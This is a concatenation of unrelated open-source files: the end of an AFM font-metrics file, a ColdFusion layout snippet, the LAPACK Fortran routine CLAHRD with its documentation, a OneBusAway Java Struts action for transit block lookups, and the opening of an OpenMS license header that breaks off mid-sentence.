C 108 ; WX 389 ; N l ; B 32 -15 375 737 ;
C 109 ; WX 944 ; N m ; B 0 -15 909 477 ;
C 110 ; WX 685 ; N n ; B 0 -15 639 477 ;
C 111 ; WX 574 ; N o ; B 0 -15 530 477 ;
C 112 ; WX 648 ; N p ; B -119 -205 590 477 ;
C 113 ; WX 630 ; N q ; B 0 -205 587 477 ;
C 114 ; WX 519 ; N r ; B 0 0 527 486 ;
C 115 ; WX 481 ; N s ; B 0 -15 435 477 ;
C 116 ; WX 407 ; N t ; B 24 -15 403 650 ;
C 117 ; WX 685 ; N u ; B 30 -15 635 477 ;
C 118 ; WX 556 ; N v ; B 30 -15 496 477 ;
C 119 ; WX 833 ; N w ; B 30 -15 773 477 ;
C 120 ; WX 574 ; N x ; B -46 -15 574 477 ;
C 121 ; WX 519 ; N y ; B -66 -205 493 477 ;
C 122 ; WX 519 ; N z ; B -19 -15 473 477 ;
C 123 ; WX 407 ; N braceleft ; B 52 -109 408 737 ;
C 124 ; WX 606 ; N bar ; B 249 -250 357 750 ;
C 125 ; WX 407 ; N braceright ; B -25 -109 331 737 ;
C 126 ; WX 606 ; N asciitilde ; B 72 160 534 346 ;
C 161 ; WX 333 ; N exclamdown ; B -44 -205 289 547 ;
C 162 ; WX 574 ; N cent ; B 30 -144 512 578 ;
C 163 ; WX 574 ; N sterling ; B -18 -15 566 705 ;
C 164 ; WX 167 ; N fraction ; B -166 -15 333 705 ;
C 165 ; WX 574 ; N yen ; B 17 0 629 690 ;
C 166 ; WX 574 ; N florin ; B -43 -205 575 737 ;
C 167 ; WX 500 ; N section ; B -30 -146 515 737 ;
C 168 ; WX 574 ; N currency ; B 27 84 547 605 ;
C 169 ; WX 287 ; N quotesingle ; B 112 388 250 737 ;
C 170 ; WX 481 ; N quotedblleft ; B 54 388 521 737 ;
C 171 ; WX 481 ; N guillemotleft ; B -35 69 449 407 ;
C 172 ; WX 278 ; N guilsinglleft ; B -25 69 244 407 ;
C 173 ; WX 278 ; N guilsinglright ; B -26 69 243 407 ;
C 174 ; WX 685 ; N fi ; B -70 -205 641 737 ;
C 175 ; WX 685 ; N fl ; B -70 -205 671 737 ;
C 177 ; WX 500 ; N endash ; B -47 189 479 287 ;
C 178 ; WX 500 ; N dagger ; B 48 -146 508 737 ;
C 179 ; WX 500 ; N daggerdbl ; B -60 -150 508 737 ;
C 180 ; WX 287 ; N periodcentered ; B 57 200 229 372 ;
C 182 ; WX 650 ; N paragraph ; B 25 -131 681 722 ;
C 183 ; WX 606 ; N bullet ; B 122 180 484 542 ;
C 184 ; WX 259 ; N quotesinglbase ; B -57 -192 170 157 ;
C 185 ; WX 481 ; N quotedblbase ; B -57 -192 412 157 ;
C 186 ; WX 481 ; N quotedblright ; B 43 388 510 737 ;
C 187 ; WX 481 ; N guillemotright ; B -31 69 453 407 ;
C 188 ; WX 1000 ; N ellipsis ; B 81 -15 919 157 ;
C 189 ; WX 1167 ; N perthousand ; B 20 -28 1147 727 ;
C 191 ; WX 481 ; N questiondown ; B 0 -205 372 547 ;
C 193 ; WX 333 ; N grave ; B 74 538 294 722 ;
C 194 ; WX 333 ; N acute ; B 123 538 372 722 ;
C 195 ; WX 333 ; N circumflex ; B 23 533 365 705 ;
C 196 ; WX 333 ; N tilde ; B 28 561 398 690 ;
C 197 ; WX 333 ; N macron ; B 47 573 404 649 ;
C 198 ; WX 333 ; N breve ; B 67 535 390 698 ;
C 199 ; WX 333 ; N dotaccent ; B 145 546 289 690 ;
C 200 ; WX 333 ; N dieresis ; B 33 546 393 690 ;
C 202 ; WX 333 ; N ring ; B 111 522 335 746 ;
C 203 ; WX 333 ; N cedilla ; B -21 -220 225 3 ;
C 205 ; WX 333 ; N hungarumlaut ; B 15 538 480 722 ;
C 206 ; WX 333 ; N ogonek ; B 68 -155 246 -10 ;
C 207 ; WX 333 ; N caron ; B 60 531 403 705 ;
C 208 ; WX 1000 ; N emdash ; B -47 189 979 287 ;
C 225 ; WX 889 ; N AE ; B -86 0 915 722 ;
C 227 ; WX 412 ; N ordfeminine ; B 47 407 460 705 ;
C 232 ; WX 704 ; N Lslash ; B -41 0 670 722 ;
C 233 ; WX 833 ; N Oslash ; B 35 -68 798 790 ;
C 234 ; WX 963 ; N OE ; B 29 0 989 722 ;
C 235 ; WX 356 ; N ordmasculine ; B 42 407 394 705 ;
C 241 ; WX 815 ; N ae ; B -18 -15 775 477 ;
C 245 ; WX 389 ; N dotlessi ; B 32 -15 345 477 ;
C 248 ; WX 389 ; N lslash ; B 5 -15 390 737 ;
C 249 ; WX 574 ; N oslash ; B 0 -121 530 583 ;
C 250 ; WX 852 ; N oe ; B -6 -15 812 477 ;
C 251 ; WX 574 ; N germandbls ; B -91 -205 540 737 ;
C -1 ; WX 519 ; N ecircumflex ; B 0 -15 479 705 ;
C -1 ; WX 519 ; N edieresis ; B 0 -15 486 690 ;
C -1 ; WX 667 ; N aacute ; B 6 -15 636 722 ;
C -1 ; WX 747 ; N registered ; B -2 -15 750 737 ;
C -1 ; WX 389 ; N icircumflex ; B 21 -15 363 698 ;
C -1 ; WX 685 ; N udieresis ; B 30 -15 635 690 ;
C -1 ; WX 574 ; N ograve ; B 0 -15 530 722 ;
C -1 ; WX 685 ; N uacute ; B 30 -15 635 722 ;
C -1 ; WX 685 ; N ucircumflex ; B 30 -15 635 705 ;
C -1 ; WX 741 ; N Aacute ; B -75 0 716 947 ;
C -1 ; WX 389 ; N igrave ; B 32 -15 345 715 ;
C -1 ; WX 444 ; N Icircumflex ; B -41 0 485 930 ;
C -1 ; WX 537 ; N ccedilla ; B 0 -220 482 477 ;
C -1 ; WX 667 ; N adieresis ; B 6 -15 636 690 ;
C -1 ; WX 741 ; N Ecircumflex ; B -41 0 730 930 ;
C -1 ; WX 481 ; N scaron ; B 0 -15 477 705 ;
C -1 ; WX 648 ; N thorn ; B -119 -205 590 737 ;
C -1 ; WX 950 ; N trademark ; B 42 317 1017 722 ;
C -1 ; WX 519 ; N egrave ; B 0 -15 479 722 ;
C -1 ; WX 344 ; N threesuperior ; B 3 273 361 705 ;
C -1 ; WX 519 ; N zcaron ; B -19 -15 473 695 ;
C -1 ; WX 667 ; N atilde ; B 6 -15 636 690 ;
C -1 ; WX 667 ; N aring ; B 6 -15 636 746 ;
C -1 ; WX 574 ; N ocircumflex ; B 0 -15 530 705 ;
C -1 ; WX 741 ; N Edieresis ; B -41 0 730 915 ;
C -1 ; WX 861 ; N threequarters ; B 35 -15 789 705 ;
C -1 ; WX 519 ; N ydieresis ; B -66 -205 493 690 ;
C -1 ; WX 519 ; N yacute ; B -66 -205 493 722 ;
C -1 ; WX 389 ; N iacute ; B 32 -15 370 715 ;
C -1 ; WX 741 ; N Acircumflex ; B -75 0 716 930 ;
C -1 ; WX 833 ; N Uacute ; B 88 -15 900 947 ;
C -1 ; WX 519 ; N eacute ; B 0 -15 479 722 ;
C -1 ; WX 833 ; N Ograve ; B 37 -15 796 947 ;
C -1 ; WX 667 ; N agrave ; B 6 -15 636 722 ;
C -1 ; WX 833 ; N Udieresis ; B 88 -15 900 915 ;
C -1 ; WX 667 ; N acircumflex ; B 6 -15 636 705 ;
C -1 ; WX 444 ; N Igrave ; B -41 0 485 947 ;
C -1 ; WX 344 ; N twosuperior ; B -17 280 362 705 ;
C -1 ; WX 833 ; N Ugrave ; B 88 -15 900 947 ;
C -1 ; WX 861 ; N onequarter ; B 17 -15 789 705 ;
C -1 ; WX 833 ; N Ucircumflex ; B 88 -15 900 930 ;
C -1 ; WX 685 ; N Scaron ; B 1 -15 666 930 ;
C -1 ; WX 444 ; N Idieresis ; B -41 0 509 915 ;
C -1 ; WX 389 ; N idieresis ; B 31 -15 391 683 ;
C -1 ; WX 741 ; N Egrave ; B -41 0 730 947 ;
C -1 ; WX 833 ; N Oacute ; B 37 -15 796 947 ;
C -1 ; WX 606 ; N divide ; B 50 -40 556 546 ;
C -1 ; WX 741 ; N Atilde ; B -75 0 716 915 ;
C -1 ; WX 741 ; N Aring ; B -75 0 716 991 ;
C -1 ; WX 833 ; N Odieresis ; B 37 -15 796 915 ;
C -1 ; WX 741 ; N Adieresis ; B -75 0 716 915 ;
C -1 ; WX 852 ; N Ntilde ; B -61 -10 913 915 ;
C -1 ; WX 704 ; N Zcaron ; B -33 0 711 930 ;
C -1 ; WX 741 ; N Thorn ; B -41 0 690 722 ;
C -1 ; WX 444 ; N Iacute ; B -41 0 488 947 ;
C -1 ; WX 606 ; N plusminus ; B 50 0 556 506 ;
C -1 ; WX 606 ; N multiply ; B 65 15 541 491 ;
C -1 ; WX 741 ; N Eacute ; B -41 0 730 947 ;
C -1 ; WX 704 ; N Ydieresis ; B 13 0 775 915 ;
C -1 ; WX 344 ; N onesuperior ; B 19 282 326 705 ;
C -1 ; WX 685 ; N ugrave ; B 30 -15 635 722 ;
C -1 ; WX 606 ; N logicalnot ; B 50 103 556 403 ;
C -1 ; WX 685 ; N ntilde ; B 0 -15 639 690 ;
C -1 ; WX 833 ; N Otilde ; B 37 -15 796 915 ;
C -1 ; WX 574 ; N otilde ; B 0 -15 530 690 ;
C -1 ; WX 759 ; N Ccedilla ; B 37 -220 759 737 ;
C -1 ; WX 741 ; N Agrave ; B -75 0 716 947 ;
C -1 ; WX 861 ; N onehalf ; B 17 -15 798 705 ;
C -1 ; WX 833 ; N Eth ; B -47 0 796 722 ;
C -1 ; WX 400 ; N degree ; B 86 419 372 705 ;
C -1 ; WX 704 ; N Yacute ; B 13 0 775 947 ;
C -1 ; WX 833 ; N Ocircumflex ; B 37 -15 796 930 ;
C -1 ; WX 574 ; N oacute ; B 0 -15 530 722 ;
C -1 ; WX 685 ; N mu ; B -89 -205 635 477 ;
C -1 ; WX 606 ; N minus ; B 50 199 556 307 ;
C -1 ; WX 574 ; N eth ; B 0 -15 530 752 ;
C -1 ; WX 574 ; N odieresis ; B 0 -15 530 690 ;
C -1 ; WX 747 ; N copyright ; B -2 -15 750 737 ;
C -1 ; WX 606 ; N brokenbar ; B 249 -175 357 675 ;
EndCharMetrics
StartKernData
StartKernPairs 239
KPX A y -33
KPX A w -25
KPX A v -10
KPX A u -15
KPX A quoteright -95
KPX A quotedblright -95
KPX A Y -70
KPX A W -84
KPX A V -100
KPX A U -32
KPX A T 5
KPX A Q 5
KPX A O 5
KPX A G 5
KPX A C 5
KPX B period 15
KPX B comma 15
KPX B U 15
KPX B A -11
KPX C A -5
KPX D period -11
KPX D comma -11
KPX D Y 6
KPX D W -11
KPX D V -18
KPX F r -27
KPX F period -91
KPX F o -47
KPX F i -41
KPX F e -41
KPX F comma -91
KPX F a -47
KPX F A -79
KPX J u -39
KPX J period -74
KPX J o -40
KPX J e -33
KPX J comma -74
KPX J a -40
KPX J A -30
KPX K y -48
KPX K u -4
KPX K o -4
KPX K e 18
KPX L y -30
KPX L quoteright -100
KPX L quotedblright -100
KPX L Y -55
KPX L W -69
KPX L V -97
KPX L T -75
KPX N period -49
KPX N comma -49
KPX O period -18
KPX O comma -18
KPX O X -18
KPX O W -15
KPX O V -24
KPX O A -5
KPX P period -100
KPX P o -40
KPX P e -33
KPX P comma -100
KPX P a -40
KPX P A -80
KPX R W -14
KPX R V -24
KPX S period -18
KPX S comma -18
KPX T y -30
KPX T w -30
KPX T u -22
KPX T r -9
KPX T period -55
KPX T o -40
KPX T i -22
KPX T hyphen -75
KPX T h -9
KPX T e -33
KPX T comma -55
KPX T a -40
KPX T O 11
KPX T A -60
KPX U period -25
KPX U comma -25
KPX U A -42
KPX V u -70
KPX V semicolon 6
KPX V period -94
KPX V o -71
KPX V i -35
KPX V hyphen -94
KPX V e -66
KPX V comma -94
KPX V colon -49
KPX V a -55
KPX V O -19
KPX V G -12
KPX V A -100
KPX W y -41
KPX W u -25
KPX W semicolon -22
KPX W period -86
KPX W o -33
KPX W i -27
KPX W hyphen -61
KPX W h 5
KPX W e -39
KPX W comma -86
KPX W colon -22
KPX W a -33
KPX W O -11
KPX W A -66
KPX Y u -58
KPX Y semicolon -55
KPX Y period -91
KPX Y o -77
KPX Y i -22
KPX Y hyphen -91
KPX Y e -71
KPX Y comma -91
KPX Y colon -55
KPX Y a -77
KPX Y A -79
KPX a y -8
KPX a w -8
KPX a v 6
KPX b y -6
KPX b v 8
KPX b period 6
KPX b comma 6
KPX c y -20
KPX c period -8
KPX c l -13
KPX c k -8
KPX c h -18
KPX c comma -8
KPX colon space -18
KPX comma space -18
KPX comma quoteright -18
KPX comma quotedblright -18
KPX d y -15
KPX d w -15
KPX e y -15
KPX e x -5
KPX e w -15
KPX e p -11
KPX e g -4
KPX e b -8
KPX f quoteright 105
KPX f quotedblright 105
KPX f period -28
KPX f o 7
KPX f l 7
KPX f i 7
KPX f e 14
KPX f dotlessi 7
KPX f comma -28
KPX f a 8
KPX g y -11
KPX g r 11
KPX g period -5
KPX g comma -5
KPX h y -20
KPX i v 7
KPX k y -15
KPX k o -22
KPX k e -16
KPX l y -7
KPX l w -7
KPX m y -20
KPX m u -11
KPX n y -20
KPX n v -7
KPX n u -11
KPX o y -11
KPX o w -8
KPX o v 6
KPX p y -4
KPX p period 8
KPX p comma 8
KPX period space -18
KPX period quoteright -18
KPX period quotedblright -18
KPX quotedblleft quoteleft 20
KPX quotedblleft A -60
KPX quotedblright space -18
KPX quoteleft A -80
KPX quoteright v -16
KPX quoteright t -22
KPX quoteright s -46
KPX quoteright r -9
KPX quoteright l -22
KPX quoteright d -41
KPX r y -20
KPX r v -7
KPX r u -11
KPX r t -11
KPX r semicolon 9
KPX r s -20
KPX r quoteright 9
KPX r period -90
KPX r p -17
KPX r o -11
KPX r l -14
KPX r k 9
KPX r i -14
KPX r hyphen -16
KPX r g -11
KPX r e -7
KPX r d -7
KPX r comma -90
KPX r colon 9
KPX r a -11
KPX s period 11
KPX s comma 11
KPX semicolon space -18
KPX space quotedblleft -18
KPX space Y -18
KPX space W -33
KPX space V -24
KPX space T -18
KPX space A -22
KPX v period -11
KPX v o -6
KPX v comma -11
KPX v a -6
KPX w period -17
KPX w o -14
KPX w e -8
KPX w comma -17
KPX w a -14
KPX x e 5
KPX y period -25
KPX y o 8
KPX y e 15
KPX y comma -25
KPX y a 8
KPX z e 4
EndKernPairs
EndKernData
StartComposites 56
CC Aacute 2 ; PCC A 0 0 ; PCC acute 259 225 ;
CC Acircumflex 2 ; PCC A 0 0 ; PCC circumflex 259 225 ;
CC Adieresis 2 ; PCC A 0 0 ; PCC dieresis 259 225 ;
CC Agrave 2 ; PCC A 0 0 ; PCC grave 259 225 ;
CC Aring 2 ; PCC A 0 0 ; PCC ring 229 245 ;
CC Atilde 2 ; PCC A 0 0 ; PCC tilde 259 225 ;
CC Eacute 2 ; PCC E 0 0 ; PCC acute 296 225 ;
CC Ecircumflex 2 ; PCC E 0 0 ; PCC circumflex 296 225 ;
CC Edieresis 2 ; PCC E 0 0 ; PCC dieresis 296 225 ;
CC Egrave 2 ; PCC E 0 0 ; PCC grave 296 225 ;
CC Iacute 2 ; PCC I 0 0 ; PCC acute 116 225 ;
CC Icircumflex 2 ; PCC I 0 0 ; PCC circumflex 116 225 ;
CC Idieresis 2 ; PCC I 0 0 ; PCC dieresis 116 225 ;
CC Igrave 2 ; PCC I 0 0 ; PCC grave 116 225 ;
CC Ntilde 2 ; PCC N 0 0 ; PCC tilde 326 225 ;
CC Oacute 2 ; PCC O 0 0 ; PCC acute 315 225 ;
CC Ocircumflex 2 ; PCC O 0 0 ; PCC circumflex 315 225 ;
CC Odieresis 2 ; PCC O 0 0 ; PCC dieresis 315 225 ;
CC Ograve 2 ; PCC O 0 0 ; PCC grave 315 225 ;
CC Otilde 2 ; PCC O 0 0 ; PCC tilde 315 225 ;
CC Scaron 2 ; PCC S 0 0 ; PCC caron 206 225 ;
CC Uacute 2 ; PCC U 0 0 ; PCC acute 340 225 ;
CC Ucircumflex 2 ; PCC U 0 0 ; PCC circumflex 340 225 ;
CC Udieresis 2 ; PCC U 0 0 ; PCC dieresis 340 225 ;
CC Ugrave 2 ; PCC U 0 0 ; PCC grave 340 225 ;
CC Yacute 2 ; PCC Y 0 0 ; PCC acute 246 225 ;
CC Ydieresis 2 ; PCC Y 0 0 ; PCC dieresis 236 225 ;
CC Zcaron 2 ; PCC Z 0 0 ; PCC caron 226 225 ;
CC aacute 2 ; PCC a 0 0 ; PCC acute 167 0 ;
CC acircumflex 2 ; PCC a 0 0 ; PCC circumflex 167 0 ;
CC adieresis 2 ; PCC a 0 0 ; PCC dieresis 167 0 ;
CC agrave 2 ; PCC a 0 0 ; PCC grave 167 0 ;
CC aring 2 ; PCC a 0 0 ; PCC ring 167 0 ;
CC atilde 2 ; PCC a 0 0 ; PCC tilde 167 0 ;
CC eacute 2 ; PCC e 0 0 ; PCC acute 93 0 ;
CC ecircumflex 2 ; PCC e 0 0 ; PCC circumflex 93 0 ;
CC edieresis 2 ; PCC e 0 0 ; PCC dieresis 93 0 ;
CC egrave 2 ; PCC e 0 0 ; PCC grave 93 0 ;
CC iacute 2 ; PCC dotlessi 0 0 ; PCC acute -2 -7 ;
CC icircumflex 2 ; PCC dotlessi 0 0 ; PCC circumflex -2 -7 ;
CC idieresis 2 ; PCC dotlessi 0 0 ; PCC dieresis -2 -7 ;
CC igrave 2 ; PCC dotlessi 0 0 ; PCC grave -2 -7 ;
CC ntilde 2 ; PCC n 0 0 ; PCC tilde 176 0 ;
CC oacute 2 ; PCC o 0 0 ; PCC acute 121 0 ;
CC ocircumflex 2 ; PCC o 0 0 ; PCC circumflex 121 0 ;
CC odieresis 2 ; PCC o 0 0 ; PCC dieresis 121 0 ;
CC ograve 2 ; PCC o 0 0 ; PCC grave 121 0 ;
CC otilde 2 ; PCC o 0 0 ; PCC tilde 121 0 ;
CC scaron 2 ; PCC s 0 0 ; PCC caron 74 0 ;
CC uacute 2 ; PCC u 0 0 ; PCC acute 176 0 ;
CC ucircumflex 2 ; PCC u 0 0 ; PCC circumflex 176 0 ;
CC udieresis 2 ; PCC u 0 0 ; PCC dieresis 176 0 ;
CC ugrave 2 ; PCC u 0 0 ; PCC grave 176 0 ;
CC yacute 2 ; PCC y 0 0 ; PCC acute 93 0 ;
CC ydieresis 2 ; PCC y 0 0 ; PCC dieresis 93 0 ;
CC zcaron 2 ; PCC z 0 0 ; PCC caron 63 -10 ;
EndComposites
EndFontMetrics
| {
"pile_set_name": "Github"
} |
<cfoutput>
start:specificlayout
#includeContent()#
end:specificlayout
</cfoutput> | {
"pile_set_name": "Github"
} |
*> \brief \b CLAHRD reduces the first nb columns of a general rectangular matrix A so that elements below the k-th subdiagonal are zero, and returns auxiliary matrices which are needed to apply the transformation to the unreduced part of A.
*
* =========== DOCUMENTATION ===========
*
* Online html documentation available at
* http://www.netlib.org/lapack/explore-html/
*
*> \htmlonly
*> Download CLAHRD + dependencies
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.tgz?format=tgz&filename=/lapack/lapack_routine/clahrd.f">
*> [TGZ]</a>
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.zip?format=zip&filename=/lapack/lapack_routine/clahrd.f">
*> [ZIP]</a>
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.txt?format=txt&filename=/lapack/lapack_routine/clahrd.f">
*> [TXT]</a>
*> \endhtmlonly
*
* Definition:
* ===========
*
* SUBROUTINE CLAHRD( N, K, NB, A, LDA, TAU, T, LDT, Y, LDY )
*
* .. Scalar Arguments ..
* INTEGER K, LDA, LDT, LDY, N, NB
* ..
* .. Array Arguments ..
* COMPLEX A( LDA, * ), T( LDT, NB ), TAU( NB ),
* $ Y( LDY, NB )
* ..
*
*
*> \par Purpose:
* =============
*>
*> \verbatim
*>
*> This routine is deprecated and has been replaced by routine CLAHR2.
*>
*> CLAHRD reduces the first NB columns of a complex general n-by-(n-k+1)
*> matrix A so that elements below the k-th subdiagonal are zero. The
*> reduction is performed by a unitary similarity transformation
*> Q**H * A * Q. The routine returns the matrices V and T which determine
*> Q as a block reflector I - V*T*V**H, and also the matrix Y = A * V * T.
*> \endverbatim
*
* Arguments:
* ==========
*
*> \param[in] N
*> \verbatim
*> N is INTEGER
*> The order of the matrix A.
*> \endverbatim
*>
*> \param[in] K
*> \verbatim
*> K is INTEGER
*> The offset for the reduction. Elements below the k-th
*> subdiagonal in the first NB columns are reduced to zero.
*> \endverbatim
*>
*> \param[in] NB
*> \verbatim
*> NB is INTEGER
*> The number of columns to be reduced.
*> \endverbatim
*>
*> \param[in,out] A
*> \verbatim
*> A is COMPLEX array, dimension (LDA,N-K+1)
*> On entry, the n-by-(n-k+1) general matrix A.
*> On exit, the elements on and above the k-th subdiagonal in
*> the first NB columns are overwritten with the corresponding
*> elements of the reduced matrix; the elements below the k-th
*> subdiagonal, with the array TAU, represent the matrix Q as a
*> product of elementary reflectors. The other columns of A are
*> unchanged. See Further Details.
*> \endverbatim
*>
*> \param[in] LDA
*> \verbatim
*> LDA is INTEGER
*> The leading dimension of the array A. LDA >= max(1,N).
*> \endverbatim
*>
*> \param[out] TAU
*> \verbatim
*> TAU is COMPLEX array, dimension (NB)
*> The scalar factors of the elementary reflectors. See Further
*> Details.
*> \endverbatim
*>
*> \param[out] T
*> \verbatim
*> T is COMPLEX array, dimension (LDT,NB)
*> The upper triangular matrix T.
*> \endverbatim
*>
*> \param[in] LDT
*> \verbatim
*> LDT is INTEGER
*> The leading dimension of the array T. LDT >= NB.
*> \endverbatim
*>
*> \param[out] Y
*> \verbatim
*> Y is COMPLEX array, dimension (LDY,NB)
*> The n-by-nb matrix Y.
*> \endverbatim
*>
*> \param[in] LDY
*> \verbatim
*> LDY is INTEGER
*> The leading dimension of the array Y. LDY >= max(1,N).
*> \endverbatim
*
* Authors:
* ========
*
*> \author Univ. of Tennessee
*> \author Univ. of California Berkeley
*> \author Univ. of Colorado Denver
*> \author NAG Ltd.
*
*> \date December 2016
*
*> \ingroup complexOTHERauxiliary
*
*> \par Further Details:
* =====================
*>
*> \verbatim
*>
*> The matrix Q is represented as a product of nb elementary reflectors
*>
*> Q = H(1) H(2) . . . H(nb).
*>
*> Each H(i) has the form
*>
*> H(i) = I - tau * v * v**H
*>
*> where tau is a complex scalar, and v is a complex vector with
*> v(1:i+k-1) = 0, v(i+k) = 1; v(i+k+1:n) is stored on exit in
*> A(i+k+1:n,i), and tau in TAU(i).
*>
*> The elements of the vectors v together form the (n-k+1)-by-nb matrix
*> V which is needed, with T and Y, to apply the transformation to the
*> unreduced part of the matrix, using an update of the form:
*> A := (I - V*T*V**H) * (A - Y*V**H).
*>
*> The contents of A on exit are illustrated by the following example
*> with n = 7, k = 3 and nb = 2:
*>
*> ( a h a a a )
*> ( a h a a a )
*> ( a h a a a )
*> ( h h a a a )
*> ( v1 h a a a )
*> ( v1 v2 a a a )
*> ( v1 v2 a a a )
*>
*> where a denotes an element of the original matrix A, h denotes a
*> modified element of the upper Hessenberg matrix H, and vi denotes an
*> element of the vector defining H(i).
*> \endverbatim
*>
* =====================================================================
SUBROUTINE CLAHRD( N, K, NB, A, LDA, TAU, T, LDT, Y, LDY )
*
* -- LAPACK auxiliary routine (version 3.7.0) --
* -- LAPACK is a software package provided by Univ. of Tennessee, --
* -- Univ. of California Berkeley, Univ. of Colorado Denver and NAG Ltd..--
* December 2016
*
* .. Scalar Arguments ..
INTEGER K, LDA, LDT, LDY, N, NB
* ..
* .. Array Arguments ..
COMPLEX A( LDA, * ), T( LDT, NB ), TAU( NB ),
$ Y( LDY, NB )
* ..
*
* =====================================================================
*
* .. Parameters ..
COMPLEX ZERO, ONE
PARAMETER ( ZERO = ( 0.0E+0, 0.0E+0 ),
$ ONE = ( 1.0E+0, 0.0E+0 ) )
* ..
* .. Local Scalars ..
INTEGER I
COMPLEX EI
* ..
* .. External Subroutines ..
EXTERNAL CAXPY, CCOPY, CGEMV, CLACGV, CLARFG, CSCAL,
$ CTRMV
* ..
* .. Intrinsic Functions ..
INTRINSIC MIN
* ..
* .. Executable Statements ..
*
* Quick return if possible
*
IF( N.LE.1 )
$ RETURN
*
DO 10 I = 1, NB
IF( I.GT.1 ) THEN
*
* Update A(1:n,i)
*
* Compute i-th column of A - Y * V**H
*
CALL CLACGV( I-1, A( K+I-1, 1 ), LDA )
CALL CGEMV( 'No transpose', N, I-1, -ONE, Y, LDY,
$ A( K+I-1, 1 ), LDA, ONE, A( 1, I ), 1 )
CALL CLACGV( I-1, A( K+I-1, 1 ), LDA )
*
* Apply I - V * T**H * V**H to this column (call it b) from the
* left, using the last column of T as workspace
*
* Let V = ( V1 ) and b = ( b1 ) (first I-1 rows)
* ( V2 ) ( b2 )
*
* where V1 is unit lower triangular
*
* w := V1**H * b1
*
CALL CCOPY( I-1, A( K+1, I ), 1, T( 1, NB ), 1 )
CALL CTRMV( 'Lower', 'Conjugate transpose', 'Unit', I-1,
$ A( K+1, 1 ), LDA, T( 1, NB ), 1 )
*
* w := w + V2**H *b2
*
CALL CGEMV( 'Conjugate transpose', N-K-I+1, I-1, ONE,
$ A( K+I, 1 ), LDA, A( K+I, I ), 1, ONE,
$ T( 1, NB ), 1 )
*
* w := T**H *w
*
CALL CTRMV( 'Upper', 'Conjugate transpose', 'Non-unit', I-1,
$ T, LDT, T( 1, NB ), 1 )
*
* b2 := b2 - V2*w
*
CALL CGEMV( 'No transpose', N-K-I+1, I-1, -ONE, A( K+I, 1 ),
$ LDA, T( 1, NB ), 1, ONE, A( K+I, I ), 1 )
*
* b1 := b1 - V1*w
*
CALL CTRMV( 'Lower', 'No transpose', 'Unit', I-1,
$ A( K+1, 1 ), LDA, T( 1, NB ), 1 )
CALL CAXPY( I-1, -ONE, T( 1, NB ), 1, A( K+1, I ), 1 )
*
A( K+I-1, I-1 ) = EI
END IF
*
* Generate the elementary reflector H(i) to annihilate
* A(k+i+1:n,i)
*
EI = A( K+I, I )
CALL CLARFG( N-K-I+1, EI, A( MIN( K+I+1, N ), I ), 1,
$ TAU( I ) )
A( K+I, I ) = ONE
*
* Compute Y(1:n,i)
*
CALL CGEMV( 'No transpose', N, N-K-I+1, ONE, A( 1, I+1 ), LDA,
$ A( K+I, I ), 1, ZERO, Y( 1, I ), 1 )
CALL CGEMV( 'Conjugate transpose', N-K-I+1, I-1, ONE,
$ A( K+I, 1 ), LDA, A( K+I, I ), 1, ZERO, T( 1, I ),
$ 1 )
CALL CGEMV( 'No transpose', N, I-1, -ONE, Y, LDY, T( 1, I ), 1,
$ ONE, Y( 1, I ), 1 )
CALL CSCAL( N, TAU( I ), Y( 1, I ), 1 )
*
* Compute T(1:i,i)
*
CALL CSCAL( I-1, -TAU( I ), T( 1, I ), 1 )
CALL CTRMV( 'Upper', 'No transpose', 'Non-unit', I-1, T, LDT,
$ T( 1, I ), 1 )
T( I, I ) = TAU( I )
*
10 CONTINUE
A( K+NB, NB ) = EI
*
RETURN
*
* End of CLAHRD
*
END
| {
"pile_set_name": "Github"
} |
/**
* Copyright (C) 2011 Brian Ferris <[email protected]>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.onebusaway.enterprise.webapp.actions.where;
import java.util.Date;
import java.util.TimeZone;
import org.apache.struts2.convention.annotation.Action;
import org.apache.struts2.convention.annotation.Actions;
import org.onebusaway.exceptions.ServiceException;
import org.onebusaway.transit_data.model.blocks.BlockConfigurationBean;
import org.onebusaway.transit_data.model.blocks.BlockInstanceBean;
import org.onebusaway.transit_data.services.TransitDataService;
import org.springframework.beans.factory.annotation.Autowired;
import com.opensymphony.xwork2.ActionSupport;
import com.opensymphony.xwork2.conversion.annotations.TypeConversion;
public class BlockAction extends ActionSupport {
private static final long serialVersionUID = 1L;
@Autowired
private TransitDataService _service;
private String _id;
private Date _serviceDate;
private BlockInstanceBean _blockInstance;
private TimeZone _timeZone;
public void setId(String id) {
_id = id;
}
@TypeConversion(converter = "org.onebusaway.presentation.impl.conversion.DateConverter")
public void setServiceDate(Date serviceDate) {
_serviceDate = serviceDate;
}
public BlockInstanceBean getBlockInstance() {
return _blockInstance;
}
public TimeZone getTimeZone() {
return _timeZone;
}
@Override
@Actions({
@Action(value = "/where/block"),
@Action(value = "/where/iphone/block")})
public String execute() throws ServiceException {
if (_id == null)
return INPUT;
_blockInstance = _service.getBlockInstance(_id, _serviceDate.getTime());
if (_blockInstance == null)
return ERROR;
BlockConfigurationBean blockConfig = _blockInstance.getBlockConfiguration();
_timeZone = TimeZone.getTimeZone(blockConfig.getTimeZone());
return SUCCESS;
}
}
| {
"pile_set_name": "Github"
} |
// --------------------------------------------------------------------------
// OpenMS -- Open-Source Mass Spectrometry
// --------------------------------------------------------------------------
// Copyright The OpenMS Team -- Eberhard Karls University Tuebingen,
// ETH Zurich, and Freie Universitaet Berlin 2002-2020.
//
// This software is released under a three-clause BSD license:
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// * Neither the name of any author or any participating institution
// may be used to endorse or promote products derived from this software
// without specific prior written permission.
// For a full list of authors, refer to the file AUTHORS.
// --------------------------------------------------------------------------
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
